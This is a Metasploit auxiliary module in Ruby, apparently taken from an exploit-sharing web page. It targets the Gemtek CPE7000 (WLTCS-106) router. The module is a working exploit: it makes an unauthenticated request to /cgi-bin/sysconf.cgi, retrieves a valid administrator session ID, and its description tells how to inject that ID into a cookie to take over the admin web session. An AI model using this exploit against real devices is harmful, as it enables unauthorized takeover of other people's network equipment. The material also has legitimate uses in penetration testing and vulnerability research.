扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 |
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever', 'Description'=> %q{ A vulnerability exists for Gemtek CPE7000 model ID WLTCS-106 which allows unauthenticated remote attackers to retrieve a valid Administrative SID. To obtain an administrative web session inject this SID in your client's cookie with values as follow: userlevel=2;sid=<SID> Tested on Hardware version V02A and Firmware version 01.01.02.082. }, 'References' => [ [ 'EDB', '39716' ], [ 'URL', 'http://www.mentat.is/docs/cpe7000-multiple-vulns.html' ], [ 'URL' , 'http://www.gemtek.com.tw/' ] ], 'Author' => [ 'Federico Scalco <fscalco [ at] mentat.is>' #Based on the exploit by Federico Ramondino <framondino [at ] mentat.is> ], 'License'=> MSF_LICENSE, 'DisclosureDate' => "Apr 07 2016", 'DefaultOptions' => { 'RPORT' => 443 } )) register_options( [ OptString.new("TARGETURI", [true, 'The base URI to target application', '/']), OptBool.new('SSL', [true, 'Use SSL', true]) ], self.class) end def run @peer = "#{rhost}:#{rport}" res = send_request_cgi({ 'method' => 'GET', 'uri'=> '/cgi-bin/sysconf.cgi', 'vars_get' => { 'page' => 'ajax.asp', 'action' => 'login_confirm' } }) if !res or res.code != 200 fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way") end ssid = res.body.split(',', 2) print_good("#{@peer} - Valid root SID retrieved: #{ssid[1]}") end end |
体验盒子
